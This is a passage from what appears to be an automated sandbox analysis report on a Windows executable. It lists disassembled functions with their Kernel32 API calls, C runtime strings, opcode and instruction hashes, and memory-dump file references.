                                  • Opcode Fuzzy Hash: 00b9fd02b01b7cf63ee49650963a307f7fdb827e7083e7606ed54f4b62f321e5
                                  • Instruction Fuzzy Hash: 20010CB9601B8081EB4BDFE7B608399A2A2FB8DFD4F089024AF0917739DE39C4548200
                                  Function 000000014000F680 Relevance: 9.2, APIs: 6, Instructions: 204COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6E7
                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F6FD
                                  • GetStringTypeW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F72B
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F799
                                  • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F84C
                                  • GetStringTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,000000014000FAB1), ref: 000000014000F911
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: StringType$ByteCharMultiWide$ErrorLast
                                  • String ID:
                                  • API String ID: 319667368-0
                                  • Opcode ID: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                  • Instruction ID: 469d978012ccf723a2c6c682b25d7e2ba576a75483cbf286a89393a26fd70a6f
                                  • Opcode Fuzzy Hash: 2ce6724d946986cc12a56c103b001eb9d1b53e8cfd560fc16f2f6c38bb9960ce
                                  • Instruction Fuzzy Hash: E3817EB2200B8096EB62DF27A4407E963A5F74CBE4F548215FB6D57BF4EB78C546A300
                                  Function 000000014000ADE0 Relevance: 9.2, APIs: 6, Instructions: 167COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE38
                                  • GetLastError.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AE4E
                                    • Part of subcall function 00000001400090F0: HeapAlloc.KERNEL32(?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423,?,?,?,000000014000FC9E), ref: 0000000140009151
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AEDE
                                  • MultiByteToWideChar.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF85
                                  • GetStringTypeW.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AF9C
                                  • GetStringTypeA.KERNEL32(?,?,?,?,00000001,?,?,000000014000B15C), ref: 000000014000AFFB
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: StringType$ByteCharMultiWide$AllocErrorHeapLast
                                  • String ID:
                                  • API String ID: 1390108997-0
                                  • Opcode ID: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                  • Instruction ID: bb54969f148ae750ab4279c880304e23b66920be01f6227d0c0ffa95ca0b2e73
                                  • Opcode Fuzzy Hash: 5ea1a9254b1b0246406da4d01ea544830426ccb00ebf91cd2bb510eeaa7b453f
                                  • Instruction Fuzzy Hash: 1B616CB22007818AEB62DF66E8407E967E1F74DBE4F144625FF5887BE5DB39C9418340
                                  Function 00007FFBC3204CD4 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 319COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Is_bad_exception_allowedstd::bad_alloc::bad_alloc
                                  • String ID: csm$csm$csm
                                  • API String ID: 3523768491-393685449
                                  • Opcode ID: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                  • Instruction ID: 912062a1e2a10727d625d8450e062c860dbc12f463aac3a044a03264adc94223
                                  • Opcode Fuzzy Hash: 7f01d96fb52924c6f5fc1d666da4b107b2a99de0eb80eb6c113e4145ccbd24ec
                                  • Instruction Fuzzy Hash: 49E195B29087818AEF10AF74D480BBE77A1FB45B48F984135DB9D6B656CF38E489C740
                                  Function 00007FFBC32095BC Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetLastError.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC32095CB
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC3209601
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC320962E
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC320963F
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC3209650
                                  • SetLastError.KERNEL32(?,?,?,00007FFBC3208BC9,?,?,?,?,00007FFBC3208C14), ref: 00007FFBC320966B
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Value$ErrorLast
                                  • String ID:
                                  • API String ID: 2506987500-0
                                  • Opcode ID: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                  • Instruction ID: ed1c50bb17997c49093f04b477dda85b111a87f84caeb1cb6af2fb04ca1e063c
                                  • Opcode Fuzzy Hash: 33ee88f61e6773b2952d25dee95f1e22d8cbd108a9fa28cb936705bbce5dbc3e
                                  • Instruction Fuzzy Hash: 43113AB0A0C24245FE647F31D65193B63529F48BB0F884334E82F2E6E6DE2CA4459700
                                  Function 0000000140013850 Relevance: 9.0, APIs: 6, Instructions: 18synchronizationCOMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CloseCriticalHandleSection$EnterEventLeaveObjectSingleWait
                                  • String ID:
                                  • API String ID: 3326452711-0
                                  • Opcode ID: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                  • Instruction ID: 377d3f5d57f943d14cdd7bc93d1ee7868a659259fbd0ecc80ccbf17849fffa4f
                                  • Opcode Fuzzy Hash: 090e3fcaa9eba1e18c75aea56b56e2fd2f402425d5e54323bcdd5196f3225223
                                  • Instruction Fuzzy Hash: 71F00274611D05D5EB029F53EC953942362B79CBD5F590111EB0E8B270DF3A8599C705
                                  Function 0000000140003790 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 70timeCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CriticalSection$EnterLeaveTimerWaitable
                                  • String ID: amps_Exec: pHandle=%p, execId=%d, iParam=%d
                                  • API String ID: 2984211723-1229430080
                                  • Opcode ID: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                  • Instruction ID: 21f659f61b14fb79d6609d2ab4e2a3109e2b4daa988e78f6170daec752ad98bd
                                  • Opcode Fuzzy Hash: 8fa1b459277aeb819b509878b21750225505e1aa195fd5cfddc3614e408b1588
                                  • Instruction Fuzzy Hash: 2C311375614B4082EB228F56F890B9A7360F78CBE4F480225FB6C4BBB4DF7AC5858740
                                  Function 00007FFBC3207F28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressFreeHandleLibraryModuleProc
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 4061214504-1276376045
                                  • Opcode ID: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                  • Instruction ID: 7a259519bc08c6f0ac289ccbe8cc23391b6b7254e680c1ba314532043cd12642
                                  • Opcode Fuzzy Hash: 0eaf2309885660167acf271fd0a1c535a59c62651c8a9772c1b781fc3320bbcf
                                  • Instruction Fuzzy Hash: 77F04FA5A1970691EF10AF34E444B3B7731AF88B61FD80335DAAD5A6E4CF2CD849C340
                                  Function 0000000140008510 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 16libraryloaderCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • GetModuleHandleA.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 000000014000851F
                                  • GetProcAddress.KERNEL32(?,?,00000028,0000000140009145,?,?,00000001,0000000140008328,?,?,00000001,000000014000B350,?,?,?,000000014000B423), ref: 0000000140008534
                                  • ExitProcess.KERNEL32 ref: 0000000140008545
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AddressExitHandleModuleProcProcess
                                  • String ID: CorExitProcess$mscoree.dll
                                  • API String ID: 75539706-1276376045
                                  • Opcode ID: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                  • Instruction ID: f47e7dafb9c87e29c0f228a4507f2bac89d7b1d3f8a3a9cfd33eb857191fa9e3
                                  • Opcode Fuzzy Hash: 4ddf6373e7a566e00e4fa2e7ca5c7f01cf3397e3372fa5b750933ca2dd1c2c09
                                  • Instruction Fuzzy Hash: 3AE04CB0711A0052FF5A9F62BC947E823517B5DB85F481429AA5E4B3B1EE7D85888340
                                  Function 00007FFBC32040D4 Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: AdjustPointer
                                  • String ID:
                                  • API String ID: 1740715915-0
                                  • Opcode ID: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                  • Instruction ID: 2a28e95cb6a7a6a9ee381350e7d0791bf42304456d6e64d1f1a1e726382e0cae
                                  • Opcode Fuzzy Hash: 50c4e1713d184cdf0fe8662c588dfc2dc4bd464af84c2e8e24b447969137b9d6
                                  • Instruction Fuzzy Hash: F9B1B2B1A0A64285EE65FF71D480A3A67A0EF54B84F9DC435DE4C2F785DE3CE8498B40
                                  Function 0000000140009F50 Relevance: 7.7, APIs: 5, Instructions: 208COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: FileInfoSleepStartupType
                                  • String ID:
                                  • API String ID: 1527402494-0
                                  • Opcode ID: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                  • Instruction ID: 2708af0267d8365e54dad009941ca9060f987db411f69ca3ecc20d856229d7df
                                  • Opcode Fuzzy Hash: b08a78d08636f6435b28fe3dd3a9dc7fe07bd3625b9b0f375563a7ba95a95139
                                  • Instruction Fuzzy Hash: 68917DB260468085E726CB2AE8487D936E4A71A7F4F554726EB79473F1DA7EC841C301
                                  Function 0000000140009E30 Relevance: 7.6, APIs: 5, Instructions: 74COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CommandLine$ByteCharErrorLastMultiWide
                                  • String ID:
                                  • API String ID: 3078728599-0
                                  • Opcode ID: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                  • Instruction ID: cab5f27f5268d67fa2b955b7a4895f7bd1e416bc4c6d53bc856f5ac88b27d897
                                  • Opcode Fuzzy Hash: ef26d27679934e8a1eb9f7884d3deda4952e844cae744d2e9e47d116f2e36b92
                                  • Instruction Fuzzy Hash: 04316D72614A8082EB21DF52F80479A77E1F78EBD0F540225FB9A87BB5DB3DC9458B00
                                  Function 000000014000FD50 Relevance: 7.6, APIs: 5, Instructions: 66COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2420993655.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                  • Associated: 00000006.00000002.2420978907.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421012872.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421028898.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000006.00000002.2421044286.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_140000000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Console$Write$ByteCharCreateErrorFileLastMultiOutputWide
                                  • String ID:
                                  • API String ID: 1850339568-0
                                  • Opcode ID: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                  • Instruction ID: bea3f08d648c3b04eb316e4c6042deaac10e1fdf59f4257f2eabc448b4c653dc
                                  • Opcode Fuzzy Hash: 4201eac49788cf302f684002ef01a2526af238478ded1ce40358f727cda20400
                                  • Instruction Fuzzy Hash: 38317AB1214A4482EB12CF22F8403AA73A1F79D7E4F544315FB6A4BAF5DB7AC5859B00
                                  Function 00007FFBC320FB54 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: _set_statfp
                                  • String ID:
                                  • API String ID: 1156100317-0
                                  • Opcode ID: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                  • Instruction ID: 46cc5dcd53557b42516c928f39491b11e945224738e3ce02a790eab27aa36c01
                                  • Opcode Fuzzy Hash: 4d3c2bc84a878a3ff3d229176cc4d467c3c986fbb6f3ea169b2dd3d189eb8c82
                                  • Instruction Fuzzy Hash: B611B4B2D9864B21FE643D38D325B7B12005F9C370F9C4230E56E2E2DA9E2C5C484700
                                  Function 00007FFBC3209684 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  • FlsGetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC32096A3
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC32096C2
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC32096EA
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC32096FB
                                  • FlsSetValue.KERNEL32(?,?,?,00007FFBC320766F,?,?,00000000,00007FFBC320790A,?,?,?,?,?,00007FFBC3207896), ref: 00007FFBC320970C
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                  • Instruction ID: 863471b9393fcf372de28e4fe3f5ea54804387744f2d3cc0a7b66040f7d46c27
                                  • Opcode Fuzzy Hash: bb51f29ac47eeb1f6796421cb9a02d5f68bea7befc5ae5f024f95b6d7c89f858
                                  • Instruction Fuzzy Hash: 061108F1A0C24245FE58BE35E55197B63519F447F0FDC4234E82E6E6E6EE2CE4459B00
                                  Function 00007FFBC3209518 Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: Value
                                  • String ID:
                                  • API String ID: 3702945584-0
                                  • Opcode ID: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                  • Instruction ID: f09811be4aabe796a3d0d19616357d09b1b139ca1cb93bfe0b2132573550671a
                                  • Opcode Fuzzy Hash: 268c2f24943cee61b6b4fcee88cdb8167fba3483a6ba8794c8981ad7437e3c9d
                                  • Instruction Fuzzy Hash: 2C11B6F0A092464AFE68BE72D45297B67518F44770E9C0634D93F2D2E2DD2CB4499B10
                                  Function 00007FFBC3205448 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CallEncodePointerTranslator
                                  • String ID: MOC$RCC
                                  • API String ID: 3544855599-2084237596
                                  • Opcode ID: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                  • Instruction ID: bc13a64d3d9333e1b4f10ba763cecc5c8f9defc2cfca4ca532505b58e41e59a4
                                  • Opcode Fuzzy Hash: 05e6bcd6379202f9de8a504331af606c6f0c7846a7ada8f8d1f8410d364d1b1d
                                  • Instruction Fuzzy Hash: 289193B3A087858AEB10EF74D4806AE7BA0FB44788F58413AEB4D2B755DF38D199C700
                                  Function 00007FFBC3203A38 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421125645.00007FFBC321F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffbc3200000_O8xg2t.jbxd
                                  Similarity
                                  • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                  • String ID: csm
                                  • API String ID: 2395640692-1018135373
                                  • Opcode ID: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                  • Instruction ID: 928aa74c63e6ba45b63879787781fe666bb26cd3bea429ba50938ed951316d26
                                  • Opcode Fuzzy Hash: 600c049ef3683cbbf08a5c5522dfbe353e9582842af90703f029184ead156da5
                                  • Instruction Fuzzy Hash: A551C172B096428ADF14EF39D484E3A7391EB44B88F888130EB4A5B788DF7CE845C700
                                  Function 00007FFBC32059C8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2421075266.00007FFBC3201000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFBC3200000, based on PE: true
                                  • Associated: 00000006.00000002.2421060682.00007FFBC3200000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421093804.00007FFBC3212000.00000002.00000001.01000000.00000009.sdmpDownload File
                                  • Associated: 00000006.00000002.2421110819.00007FFBC321D000.00000004.00000001.01000000.00000009.sdmpDownload File
